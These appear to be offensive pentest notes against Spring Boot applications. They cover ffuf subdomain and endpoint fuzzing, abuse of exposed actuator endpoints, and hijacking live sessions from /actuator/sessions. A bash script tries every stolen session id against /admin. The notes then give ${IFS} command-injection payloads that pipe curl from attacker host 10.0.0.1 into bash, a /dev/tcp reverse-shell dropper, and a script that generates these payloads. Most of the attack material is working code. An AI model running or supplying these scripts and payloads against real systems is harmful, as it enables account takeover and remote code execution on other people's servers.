- robots.txt
- sitemap.xml
# Command : ffuf -w <wordlist> -u http://<host>.fr/ -H 'Host: FUZZ.<host>.fr' -fs 15949
# -fs <size> filters out responses with the size of the default page; measure that size first with a bogus Host header, the value 15949 is specific to the target.
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://mywebsite.fr/ -H 'Host: FUZZ.mywebsite.fr' -fs 15949
Check a random page that does not exist, e.g. /qmdkgjrot12dfgg. If the error page returns "Whitelabel Error Page" (usually with the line "This application has no explicit mapping for /error"), the application is built on Spring Boot: that is the framework's default error page.
| Endpoint | Description |
|---|---|
| /actuator | Index of the actuator endpoints the application exposes; each entry is a link, so this tells you which of the ones below are enabled |
| /actuator/sessions | Lists active sessions and their session ids (requires Spring Session; the stock endpoint filters by ?username=<user>, some applications return every session as an id-to-user map) |
| /actuator/beans | Lists every Spring bean in the application context with its class and dependencies, which reveals the libraries and components in use |
| /actuator/health | Application health status (UP/DOWN); when details are enabled it also reports components such as the database and disk space |
| /actuator/env | Dumps configuration properties and environment variables (system environment, application.properties, etc.); values of keys containing password, secret, key or token are masked with ******, but hostnames, usernames and internal paths still leak |
| /actuator/mappings | Detailed overview of all the request mappings configured in the application: a JSON response listing each URL pattern with its handler method and the HTTP methods it accepts (GET, POST, etc.), i.e. a full map of the application's routes including unlinked ones |
Known Spring Boot-specific wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/spring-boot.txt
# FFUZ is a custom keyword bound to the wordlist; -ic drops the comment lines of the wordlist, -t 10 limits the threads
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/spring-boot.txt:FFUZ -u http://mywebsite.com/FFUZ -ic -t 10
We see the session identifiers, which we can grab and set as a cookie in our browser using the developer console's Storage tab. Pick the session that belongs to a privileged user when the endpoint shows the principal.
Important note: sometimes Firefox's Storage tab refuses to add a cookie directly. Adding the value to Local Storage or Session Storage does not help by itself, because only cookies are sent with the request; if the UI refuses, set the cookie from the browser console or pass it to curl with -b instead. Name the cookie JSESSIONID (the servlet container's session cookie); if the application uses Spring Session the cookie is called SESSION, so copy whatever name the login page sets.
Once the session identifier is added, try to access the authenticated user or admin web pages (e.g. /admin, /console, etc.).
Important note: sometimes the session identifier is expired, which typically shows up as a redirect to the login page. In this case, reload the /actuator/sessions page, take a new session identifier and replace it in the developer console's Storage tab.
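The procedure above, automated as an added example (this script is not part of the original notes): it pulls the ids out of the /actuator/sessions response and tries each one as a session cookie against a protected page, then classifies the answer so expired ids are spotted without the browser. The target URL, the /admin path, the cookie name and the sample JSON are assumptions; the stock Spring Session endpoint returns a "sessions" list (and expects ?username=<user>), while some applications return a flat id-to-principal map, so both shapes are parsed.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): try every session id exposed by
# /actuator/sessions as a session cookie against a protected page.
# TARGET, PROTECTED and the cookie name are assumptions; adjust to the application.
TARGET="${TARGET:-http://mywebsite.com}"
PROTECTED="${PROTECTED:-/admin}"
COOKIE_NAME="${COOKIE_NAME:-JSESSIONID}"   # SESSION when Spring Session is used

# Extract session ids from the JSON. Two shapes are handled without jq:
#   {"sessions":[{"id":"...","principal":"...",...}]}   (stock Spring Session endpoint)
#   {"<id>":"<principal>", ...}                           (flat map seen on some targets)
extract_session_ids() {
  local json="$1"
  if printf '%s' "$json" | grep -q '"id"'; then
    printf '%s' "$json" | grep -oE '"id" *: *"[^"]+"' | sed -E 's/.*: *"([^"]+)"/\1/'
  else
    printf '%s' "$json" | grep -oE '"[^"]+" *: *"[^"]*"' | sed -E 's/^"([^"]+)".*/\1/'
  fi
}

# Classify one probe from its status code and Location header:
# 200 means the protected page rendered with that session, a redirect to the
# login page means the id is expired or invalid (grab a fresh one and retry).
session_state() {
  local status="$1" location="$2"
  case "$status" in
    200) echo live ;;
    301|302|303|307) case "$location" in *login*) echo expired ;; *) echo redirect ;; esac ;;
    401|403) echo denied ;;
    *) echo "unknown($status)" ;;
  esac
}

# Network step: send the cookie with curl and read back status + Location.
probe_session() {
  local id="$1" hdr status location
  hdr=$(curl -s -o /dev/null -D - -b "$COOKIE_NAME=$id" "$TARGET$PROTECTED")
  status=$(printf '%s\n' "$hdr" | head -n1 | awk '{print $2}')
  location=$(printf '%s\n' "$hdr" | grep -i '^Location:' | awk '{print $2}' | tr -d '\r')
  echo "$id -> $(session_state "$status" "$location")"
}

# Fetch the session list and probe every id it contains.
hijack_all() {
  extract_session_ids "$(curl -s "$TARGET/actuator/sessions")" | while read -r id; do
    probe_session "$id"
  done
}

# Constructed sample response (not captured from a real target) for an offline check.
SAMPLE='{"sessions":[{"id":"96OO6A1B2C3D","principal":"kanderson","expired":false}]}'

# Run the live probe only when asked: RUN_PROBE=1 TARGET=http://host ./hijack.sh
if [ -n "${RUN_PROBE:-}" ]; then
  hijack_all
fi
```

Run it with RUN_PROBE=1 against the target; every id that comes back as "live" is a usable session, and a run where everything is "expired" means the list must be refreshed, exactly as in the manual procedure.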
Often the injected field rejects or strips white space, so to bypass this we can use ${IFS} as a delimiter: it is a special shell variable that stands for Internal Field Separator and defaults to a space followed by a tab and a newline in shells like Bash and sh, so the shell splits words on it just as it would on a real space. Keep the braces: $IFSfoo would be read as a variable named IFSfoo, while ${IFS}foo is IFS followed by the literal foo.
Example of command injection using ${IFS} as a delimiter (10.0.0.1 is the attacker host):
# Start 'python3 -m http.server 4444' on the attacker side beforehand to serve reverse.sh, and a listener for the shell with 'nc -lvnp 4449'
test;curl${IFS}http://10.0.0.1:4444; => tries to connect to the attacker's HTTP server; a hit in the http.server log confirms blind command execution
test;curl${IFS}http://10.0.0.1:4444/reverse.sh|bash; => connects to the attacker server, downloads the reverse shell (reverse.sh) and executes it with bash.
# Example of reverse shell generation on the attacker side (/dev/tcp and >& are Bash features, hence the #!/bin/bash shebang)
# echo -e '#!/bin/bash\nsh -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > reverse.sh
echo -e '#!/bin/bash\nsh -i >& /dev/tcp/10.0.0.1/4449 0>&1' > reverse.sh
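As an added example (not code from the original notes), the payloads above generalised into a small bash helper: it rewrites any command into its ${IFS} form, wraps it in the "<expected value>;<command>;" shape the notes use, runs the encoded string through a local bash to prove the separator really works before it is sent to a blind target, and writes the reverse-shell dropper for a chosen listener. The field value "test", the attacker address 10.0.0.1 and the ports are placeholders.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): build space-free injection payloads
# with ${IFS} and check locally that the shell splits them back into words.
# The field value "test", the attacker address 10.0.0.1 and the ports are placeholders.

# Replace each space with ${IFS}. Keep the braces: in "$IFSfoo" the shell reads a
# variable named IFSfoo (unset, so empty) whereas "${IFS}foo" is IFS then literal foo.
ifs_encode() {
  printf '%s' "$1" | sed 's/ /${IFS}/g'
}

# Value to submit in the vulnerable field: the expected input, then the encoded
# command, each terminated by ';' so the original command line still parses.
injection_payload() {
  local legit="$1" cmd="$2"
  printf '%s;%s;' "$legit" "$(ifs_encode "$cmd")"
}

# Run an encoded string the way the target's shell would. Use it locally to
# confirm a payload before sending it: a broken separator shows up here rather
# than silently failing on the blind target.
run_encoded() {
  bash -c "$1"
}

# Write the reverse-shell dropper from the notes for a given listener and print it.
# Serve it with 'python3 -m http.server 4444' and listen with 'nc -lvnp <port>'.
make_reverse_sh() {
  local ip="$1" port="$2" out="${3:-reverse.sh}"
  printf '#!/bin/bash\nsh -i >& /dev/tcp/%s/%s 0>&1\n' "$ip" "$port" > "$out"
  cat "$out"
}

# Stage 1: a bare callback to prove execution (watch the http.server log).
PAYLOAD_PING=$(injection_payload test 'curl http://10.0.0.1:4444')
# Stage 2: fetch the dropper and pipe it to bash.
PAYLOAD_SHELL=$(injection_payload test 'curl http://10.0.0.1:4444/reverse.sh | bash')
```

run_encoded is the useful part when a payload misbehaves: 'echo${IFS}hello${IFS}world' prints "hello world", while 'echo$IFShello' prints nothing because the shell looked up a variable called IFShello, which is the mistake the braces prevent.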